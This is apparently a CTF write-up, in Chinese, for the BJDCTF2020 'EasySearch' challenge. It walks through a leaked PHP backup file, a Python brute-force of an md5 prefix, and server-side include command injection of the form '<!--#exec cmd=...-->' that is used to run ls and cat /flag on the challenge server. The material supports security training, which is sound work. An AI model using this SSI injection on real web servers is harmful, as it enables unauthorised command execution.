[BJDCTF2020]EasySearch

题目

过程
1.主页面尝试注入，无果。御剑扫描后台发现index.php.swp文件。访问可以看到后端程序。

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

2.审计源码，告诉我们，username已经给定了，username=6d0bc1；password是以6d0bc1为开头的一串md5值。尝试写脚本爆破。之后还会在public目录下写一个以shtml结尾的文件。

import hashlib
for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

选取其中一个即可。我用2020666。

3.shtml文件出现了，访问一下。发现什么都没有，抓包无结果。在网上查阅资料后才发现，shtml文件存在ssti注入漏洞。
格式：

<!--#exec cmd="命令"-->

4.注入点应该还是前面的user和passwd。注意要使用url编码，否则不成功，此处尝试多次。所以最好使用bp直接编码。
ls没有发现flag所在，直接cat /flag也不行，回到根目录看一下

访问public/9c3d29a74681232313999f7d5c4edb3d39d01610.shtml发现flag所在

5.结束